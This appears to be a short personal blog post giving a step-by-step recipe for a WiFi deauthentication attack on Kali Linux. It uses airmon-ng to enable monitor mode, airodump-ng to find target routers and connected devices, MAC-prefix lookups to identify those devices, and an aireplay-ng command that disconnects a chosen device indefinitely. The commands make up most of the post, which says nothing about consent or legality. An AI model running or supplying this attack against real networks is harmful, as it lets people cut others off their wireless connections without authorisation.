Wifi Deauthentication attack on Kali linux
You might have to run these as sudo
(root). Also, do not be alarmed if your computer does not find your wifi card. A clean reboot will solve the issue.
- Get the name if your wireless card : the only one with information.
iwconfig
Mine was wlp2s0
.
- Put the boi is monitor mode. This is to allow it to monitor network traffic.
airmon-ng start wlp2s0
- Run
iwconfig
again. It should now have amon
at the end. Mine becamewlp2s0mon
. - Run the following to see the list of routers and their corresponding WiFi names. Note the BSSID( thatās the Mac address) of the network of choice, and itās channel (CH).
airodump-ng wlp2s0mon
- Run the following to see the devices connected to this WiFi. These appear under āStationā. Itās the mac address of the device.
airodump-ng wlan0mon --bssid [routers BSSID here]--channel [routers channel here]
To find out what the device is, google the first 3 sections of the deviceās mac address, and you can see the device manufacturer info and hence be able to identify the device.
- Deauth! Run:
aireplay-ng --deauth 0 -c [DEVICES MAC ADDRESS] -a [ROUTERS MAC ADDRESS] wlp2s0mon
0 is for infinite attacks, until manually stopped. Specify a number of choice for finite number of attacks.
References: #
- Previous: The Phantom Toolbooth
- Next: My first Arch Linux install